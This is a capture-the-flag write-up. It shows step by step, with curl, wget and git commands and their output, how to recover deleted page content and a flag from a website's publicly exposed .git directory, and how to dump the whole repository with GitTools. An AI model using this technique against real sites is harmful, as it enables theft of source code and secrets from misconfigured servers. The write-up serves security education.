# Meet the Team

```md  
Recover the list of employees working at CONSTELLATIONS.

With the flag of this challenge, you should find new information that will
help with future challenges.

You should find the flag for this challenge ON THIS constellations.page
website. You will not find it on GitHub.

HINT: "Can we please stop sharing our version control software out on our
website?"

HINT AGAIN: you are looking for a _publicly accessible version control
software folder published on_ the constellations.page website itself

After solving this challenge, you may need to refresh the page to see the
newly unlocked challenges.  
```

Well, at this point I know about the `/.git/` folder, and the commit message
clearly says something was removed. This could be confirmed by visiting
[constellations.page/meet-the-team.html](https://constellations.page/meet-the-team.html)
as it will give a message saying that info was redacted.

## Snooping around .git/logs

```  
$ curl -v 34.117.193.93:80/.git/logs/HEAD  
* Trying 34.117.193.93:80...  
* Connected to 34.117.193.93 (34.117.193.93) port 80 (#0)  
> GET /.git/logs/HEAD HTTP/1.1  
> Host: 34.117.193.93  
> User-Agent: curl/7.74.0  
> Accept: */*  
>  
* Mark bundle as not supporting multiuse  
< HTTP/1.1 200 OK  
< Date: Sat, 13 Mar 2021 14:04:12 GMT  
< Server: Apache/2.4.25 (Debian)  
< Last-Modified: Wed, 24 Feb 2021 00:20:18 GMT  
< ETag: "799-5bc09ffecf480"  
< Accept-Ranges: bytes  
< Content-Length: 1945  
< Via: 1.1 google  
<  
0000000000000000000000000000000000000000 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614124430 -0500 commit (initial): Added initial assets and landing page
1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614124968 -0500 commit: Added the Meet The Team page
87b17a86409582c162e260795afdf104dc1d46b1 8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 Leo Rison <[email protected]> 1614125173 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt
8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614125488 -0500 checkout: moving from master to 87b17a
87b17a86409582c162e260795afdf104dc1d46b1 0780dea9ede681b1e4276d74740bb11056d97c39 Leo Rison <[email protected]> 1614125881 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt
0780dea9ede681b1e4276d74740bb11056d97c39 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614125918 -0500 checkout: moving from 0780dea9ede681b1e4276d74740bb11056d97c39 to 87b17a86409582c162e260795afdf104dc1d46b1
87b17a86409582c162e260795afdf104dc1d46b1 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614125954 -0500 checkout: moving from 87b17a86409582c162e260795afdf104dc1d46b1 to 1142cc
1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 4c88ac1c56fe228267cf415c3ef87d7c3b8abd60 Leo Rison <[email protected]> 1614125972 -0500 commit: Added the Meet The Team page
4c88ac1c56fe228267cf415c3ef87d7c3b8abd60 e7d4663ac6b436f95684c8bfc428cef0d7731455 Leo Rison <[email protected]> 1614126014 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt
* Connection #0 to host 34.117.193.93 left intact  
```

```  
$ curl -v 34.117.193.93:80/.git/logs/refs/heads/master  
* Trying 34.117.193.93:80...  
* Connected to 34.117.193.93 (34.117.193.93) port 80 (#0)  
> GET /.git/logs/refs/heads/master HTTP/1.1  
> Host: 34.117.193.93  
> User-Agent: curl/7.74.0  
> Accept: */*  
>  
* Mark bundle as not supporting multiuse  
< HTTP/1.1 200 OK  
< Date: Sat, 13 Mar 2021 14:13:07 GMT  
< Server: Apache/2.4.25 (Debian)  
< Last-Modified: Wed, 24 Feb 2021 00:06:36 GMT  
< ETag: "271-5bc09ceee3b00"  
< Accept-Ranges: bytes  
< Content-Length: 625  
< Via: 1.1 google  
<  
0000000000000000000000000000000000000000 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614124430 -0500 commit (initial): Added initial assets and landing page
1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614124968 -0500 commit: Added the Meet The Team page
87b17a86409582c162e260795afdf104dc1d46b1 8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 Leo Rison <[email protected]> 1614125173 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt
* Connection #0 to host 34.117.193.93 left intact  
```

Every time you create a file and track it, git compresses it and stores it
in its own data structure. The compressed object has a unique name, a
hash, and is stored under the objects directory. According to the [Git
documentation](https://git-scm.com/book/en/v2/Git-Internals-Git-Objects), each
commit should give three different object files: the `commit`, the `tree` and
the `blob`.

Above, we can see the hashes for each commit, and if the hash of a file is
`87b17a86409582c162e260795afdf104dc1d46b1`, git will store it in the
`.git/objects/87` folder under the file name
`b17a86409582c162e260795afdf104dc1d46b1`.

The `commit` hash `87b17a...` is the one that seems like it might have the full
`meet-the-team.html` file in it, so I grabbed the object file with wget:

```  
$ wget 34.117.193.93:80/.git/objects/87/b17a86409582c162e260795afdf104dc1d46b1  
--2021-03-13 14:36:33--  http://34.117.193.93/.git/objects/87/b17a86409582c162e260795afdf104dc1d46b1
Connecting to 34.117.193.93:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 177
Saving to: ‘b17a86409582c162e260795afdf104dc1d46b1’
b17a86409582c162e260795afdf104dc1d46b1 100%
2021-03-13 14:36:34 (36.7 MB/s) - ‘b17a86409582c162e260795afdf104dc1d46b1’ saved [177/177]
```

At this point, it turned out the best thing to do was to init a new git repo
locally, and start rebuilding the file-structure from the target host.

```  
$ git init  
$ cd .git/objects  
$ mkdir 87 && cd 87/  
$ wget 34.117.193.93:80/.git/objects/87/b17a86409582c162e260795afdf104dc1d46b1  
```

This should leave me with the commit hash in the folder that git would expect,
and I can now try using the built-in git tools to have a look:

```  
$ git cat-file -p 87b17  
tree e4b05dc6b28a9c9a023c8bf998ce548a125dbcad  
parent 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a  
author Leo Rison <[email protected]> 1614124968 -0500  
committer Leo Rison <[email protected]> 1614124968 -0500  
```

Perfect, we now know the `tree` hash is
`e4b05dc6b28a9c9a023c8bf998ce548a125dbcad`, so time to recreate its folder
inside of `.git/objects` and see what's inside:

```  
$ mkdir e4 && cd e4/  
$ wget 34.117.193.93:80/.git/objects/e4/b05dc6b28a9c9a023c8bf998ce548a125dbcad  
$ git cat-file -p e4b05  
040000 tree 71f61d1666dcbd3e8e63f9b1c2e3cd9a6465fe65 assets  
100644 blob 7b74d5ec40c3014c2be272f1a9d1e1896f3f56a4 index.html  
100644 blob aa133c2b96c58dc78f775cc02632a9a4685e8b46 meet-the-team.html  
```

And there we have our `blob` hashes! Now it is time to finally get that
`meet-the-team.html` file I am after:

```  
$ mkdir aa && cd aa/  
$ wget 34.117.193.93:80/.git/objects/aa/133c2b96c58dc78f775cc02632a9a4685e8b46  
$ git cat-file -p aa133 > meet-the-team.html  
$ cat meet-the-team.html  
```

This gives us no flags, but gives us a list of some interesting employees!

## GitTools

Ok, so it seems like it is time to try something different...

Let's see if we can't just dump out the whole git repository using
[GitTools](https://github.com/internetwache/GitTools).

Using the `Dumper` and the `Extractor` to get as much as possible from the
`.git/`-folder:

```  
$ mkdir git-dump && cd git-dump  
$ ./gitdumper.sh https://constellations.page/.git/ ./  
..  
$ ./extractor.sh ./ processed-repo  
```

It turns out I did not really need to do the extraction step (or much else of
the above for that matter!!) - but I was curious. At this point, we can view
the complete change-log for the repo. And yes - if we check the latest commit
via `git show` or some GUI maybe - we get the flag if we look at the diff!

**I could have gotten this flag so much earlier had I either looked for some
tool to extract `.git` directories sooner - or looked at either _the correct
version_ of meet-the-team.html or the commit logs before! But I got there in
the end**

## Employee List

- Orion Morra — Support
- Lyra Patte — Marketing
- Leo Rison — Development
- Gemini Coley — Operations
- Hercules Scoxland — Sales
- Vela Leray — Management
- Pavo Welly — HR
- Gus Rodry — Accounting

Original writeup (https://thomaspreece.com/2021/03/15/nathamcon-ctf-2021/#9-meet-the-team).